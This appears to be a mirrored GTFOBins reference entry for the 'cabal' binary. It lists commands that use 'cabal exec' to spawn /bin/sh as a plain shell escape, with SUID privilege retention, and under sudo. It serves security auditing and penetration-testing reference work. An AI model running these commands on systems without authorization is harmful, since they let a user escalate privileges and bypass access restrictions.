1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/cabal.md

10 lines
156 B
Markdown
Raw Permalink Normal View History

---
functions:
shell:
- code: cabal exec -- /bin/sh
suid:
- code: ./cabal exec -- /bin/sh -p
sudo:
- code: sudo cabal exec -- /bin/sh
---